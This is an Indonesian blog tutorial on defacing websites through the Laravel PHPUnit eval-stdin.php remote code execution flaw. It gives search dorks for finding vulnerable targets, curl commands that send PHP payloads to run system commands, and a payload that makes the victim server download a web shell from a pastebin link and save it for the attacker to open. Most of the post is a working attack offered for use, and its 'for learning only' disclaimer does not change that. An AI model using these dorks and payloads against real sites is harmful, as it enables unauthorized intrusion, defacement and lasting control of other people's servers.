Hallo ^_^ kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )
Pertama Dorking dulu dengan dork dibawah in bro
DORK :
inurl:/vendor/phpunit/phpunit/srcinurl:/phpunit/src/Util/PHP/
Exploit :
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data
Payload yang bisa digunakan :
<?php echo php_uname(); ?>
<?php echo system('id'); ?>
Contoh command
curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :
<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>
Setelah itu buka access Shell kalian di
http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php
Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )
NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."
Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution
EmoticonEmoticon